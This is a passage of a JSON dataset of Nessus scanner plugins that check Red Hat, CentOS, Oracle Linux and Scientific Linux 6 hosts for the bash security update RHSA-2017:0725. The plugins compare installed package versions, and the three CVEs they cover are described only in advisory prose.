Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe bash packages provide Bash (Bourne-again shell), which is the default shell for Red Hat Enterprise Linux.\n\nSecurity Fix(es) :\n\n* An arbitrary command injection flaw was found in the way bash processed the hostname value. A malicious DHCP server could use this flaw to execute arbitrary commands on the DHCP client machines running bash under specific circumstances. (CVE-2016-0634)\n\n* An arbitrary command injection flaw was found in the way bash processed the SHELLOPTS and PS4 environment variables. A local, authenticated attacker could use this flaw to exploit poorly written setuid programs to elevate their privileges under certain circumstances. (CVE-2016-7543)\n\n* A denial of service flaw was found in the way bash handled popd commands. A poorly written shell script could cause bash to crash resulting in a local denial of service limited to a specific bash session. (CVE-2016-9401)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 6.9 Release Notes and Red Hat Enterprise Linux 6.9 Technical Notes linked from the References section.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-22T00:00:00", "type": "nessus", "title": "RHEL 6 : bash (RHSA-2017:0725)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bash", "p-cpe:/a:redhat:enterprise_linux:bash-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bash-doc", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2017-0725.NASL", "href": "https://www.tenable.com/plugins/nessus/97883", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0725. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97883);\n script_version(\"3.10\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\");\n script_xref(name:\"RHSA\", value:\"2017:0725\");\n\n script_name(english:\"RHEL 6 : bash (RHSA-2017:0725)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for bash is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bash packages provide Bash (Bourne-again shell), which is the\ndefault shell for Red Hat Enterprise Linux.\n\nSecurity Fix(es) :\n\n* An arbitrary command injection flaw was found in the way bash\nprocessed the hostname value. A malicious DHCP server could use this\nflaw to execute arbitrary commands on the DHCP client machines running\nbash under specific circumstances. (CVE-2016-0634)\n\n* An arbitrary command injection flaw was found in the way bash\nprocessed the SHELLOPTS and PS4 environment variables. A local,\nauthenticated attacker could use this flaw to exploit poorly written\nsetuid programs to elevate their privileges under certain\ncircumstances. (CVE-2016-7543)\n\n* A denial of service flaw was found in the way bash handled popd\ncommands. A poorly written shell script could cause bash to crash\nresulting in a local denial of service limited to a specific bash\nsession. (CVE-2016-9401)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 6.9 Release Notes and Red Hat Enterprise Linux 6.9\nTechnical Notes linked from the References section.\"\n );\n # https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b5caa05f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0725\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0634\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7543\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9401\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0725\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-4.1.2-48.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-4.1.2-48.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-4.1.2-48.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-debuginfo-4.1.2-48.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-debuginfo-4.1.2-48.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.1.2-48.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-doc-4.1.2-48.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-doc-4.1.2-48.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-48.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:19", "description": "An update for bash is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe bash packages provide Bash (Bourne-again shell), which is the default shell for Red Hat Enterprise Linux.\n\nSecurity Fix(es) :\n\n* An arbitrary command injection flaw was found in the way bash processed the hostname value. A malicious DHCP server could use this flaw to execute arbitrary commands on the DHCP client machines running bash under specific circumstances. (CVE-2016-0634)\n\n* An arbitrary command injection flaw was found in the way bash processed the SHELLOPTS and PS4 environment variables. A local, authenticated attacker could use this flaw to exploit poorly written setuid programs to elevate their privileges under certain circumstances. (CVE-2016-7543)\n\n* A denial of service flaw was found in the way bash handled popd commands. A poorly written shell script could cause bash to crash resulting in a local denial of service limited to a specific bash session. (CVE-2016-9401)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 6.9 Release Notes and Red Hat Enterprise Linux 6.9 Technical Notes linked from the References section.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-27T00:00:00", "type": "nessus", "title": "CentOS 6 : bash (CESA-2017:0725)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:bash", "p-cpe:/a:centos:centos:bash-doc", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2017-0725.NASL", "href": "https://www.tenable.com/plugins/nessus/97959", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0725 and \n# CentOS Errata and Security Advisory 2017:0725 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97959);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\");\n script_xref(name:\"RHSA\", value:\"2017:0725\");\n\n script_name(english:\"CentOS 6 : bash (CESA-2017:0725)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for bash is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bash packages provide Bash (Bourne-again shell), which is the\ndefault shell for Red Hat Enterprise Linux.\n\nSecurity Fix(es) :\n\n* An arbitrary command injection flaw was found in the way bash\nprocessed the hostname value. A malicious DHCP server could use this\nflaw to execute arbitrary commands on the DHCP client machines running\nbash under specific circumstances. (CVE-2016-0634)\n\n* An arbitrary command injection flaw was found in the way bash\nprocessed the SHELLOPTS and PS4 environment variables. A local,\nauthenticated attacker could use this flaw to exploit poorly written\nsetuid programs to elevate their privileges under certain\ncircumstances. (CVE-2016-7543)\n\n* A denial of service flaw was found in the way bash handled popd\ncommands. A poorly written shell script could cause bash to crash\nresulting in a local denial of service limited to a specific bash\nsession. (CVE-2016-9401)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 6.9 Release Notes and Red Hat Enterprise Linux 6.9\nTechnical Notes linked from the References section.\"\n );\n # http://lists.centos.org/pipermail/centos-cr-announce/2017-March/003724.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?97c2a33a\"\n );\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages. Note that the updated packages\nmay not be immediately available from the package repository and its\nmirrors.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-4.1.2-48.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-doc-4.1.2-48.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:26", "description": "From Red Hat Security Advisory 2017:0725 :\n\nAn update for bash is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe bash packages provide Bash (Bourne-again shell), which is the default shell for Red Hat Enterprise Linux.\n\nSecurity Fix(es) :\n\n* An arbitrary command injection flaw was found in the way bash processed the hostname value. A malicious DHCP server could use this flaw to execute arbitrary commands on the DHCP client machines running bash under specific circumstances. (CVE-2016-0634)\n\n* An arbitrary command injection flaw was found in the way bash processed the SHELLOPTS and PS4 environment variables. A local, authenticated attacker could use this flaw to exploit poorly written setuid programs to elevate their privileges under certain circumstances. (CVE-2016-7543)\n\n* A denial of service flaw was found in the way bash handled popd commands. A poorly written shell script could cause bash to crash resulting in a local denial of service limited to a specific bash session. (CVE-2016-9401)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 6.9 Release Notes and Red Hat Enterprise Linux 6.9 Technical Notes linked from the References section.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-30T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : bash (ELSA-2017-0725)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2017-0725.NASL", "href": "https://www.tenable.com/plugins/nessus/99071", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:0725 and \n# Oracle Linux Security Advisory ELSA-2017-0725 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99071);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\");\n script_xref(name:\"RHSA\", value:\"2017:0725\");\n\n script_name(english:\"Oracle Linux 6 : bash (ELSA-2017-0725)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:0725 :\n\nAn update for bash is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bash packages provide Bash (Bourne-again shell), which is the\ndefault shell for Red Hat Enterprise Linux.\n\nSecurity Fix(es) :\n\n* An arbitrary command injection flaw was found in the way bash\nprocessed the hostname value. A malicious DHCP server could use this\nflaw to execute arbitrary commands on the DHCP client machines running\nbash under specific circumstances. (CVE-2016-0634)\n\n* An arbitrary command injection flaw was found in the way bash\nprocessed the SHELLOPTS and PS4 environment variables. A local,\nauthenticated attacker could use this flaw to exploit poorly written\nsetuid programs to elevate their privileges under certain\ncircumstances. (CVE-2016-7543)\n\n* A denial of service flaw was found in the way bash handled popd\ncommands. A poorly written shell script could cause bash to crash\nresulting in a local denial of service limited to a specific bash\nsession. (CVE-2016-9401)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 6.9 Release Notes and Red Hat Enterprise Linux 6.9\nTechnical Notes linked from the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-March/006800.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"bash-4.1.2-48.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bash-doc-4.1.2-48.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:26", "description": "Security Fix(es) :\n\n - An arbitrary command injection flaw was found in the way bash processed the hostname value. A malicious DHCP server could use this flaw to execute arbitrary commands on the DHCP client machines running bash under specific circumstances. (CVE-2016-0634)\n\n - An arbitrary command injection flaw was found in the way bash processed the SHELLOPTS and PS4 environment variables. A local, authenticated attacker could use this flaw to exploit poorly written setuid programs to elevate their privileges under certain circumstances.\n (CVE-2016-7543)\n\n - A denial of service flaw was found in the way bash handled popd commands. A poorly written shell script could cause bash to crash resulting in a local denial of service limited to a specific bash session.\n (CVE-2016-9401)", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-06T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : bash on SL6.x i386/x86_64 (20170321)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:bash", "p-cpe:/a:fermilab:scientific_linux:bash-debuginfo", "p-cpe:/a:fermilab:scientific_linux:bash-doc", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20170321_BASH_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/99214", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99214);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\");\n\n script_name(english:\"Scientific Linux Security Update : bash on SL6.x i386/x86_64 (20170321)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - An arbitrary command injection flaw was found in the way\n bash processed the hostname value. A malicious DHCP\n server could use this flaw to execute arbitrary commands\n on the DHCP client machines running bash under specific\n circumstances. (CVE-2016-0634)\n\n - An arbitrary command injection flaw was found in the way\n bash processed the SHELLOPTS and PS4 environment\n variables. A local, authenticated attacker could use\n this flaw to exploit poorly written setuid programs to\n elevate their privileges under certain circumstances.\n (CVE-2016-7543)\n\n - A denial of service flaw was found in the way bash\n handled popd commands. A poorly written shell script\n could cause bash to crash resulting in a local denial of\n service limited to a specific bash session.\n (CVE-2016-9401)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1704&L=scientific-linux-errata&F=&S=&P=5255\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a1df2e78\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"bash-4.1.2-48.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bash-debuginfo-4.1.2-48.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bash-doc-4.1.2-48.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n 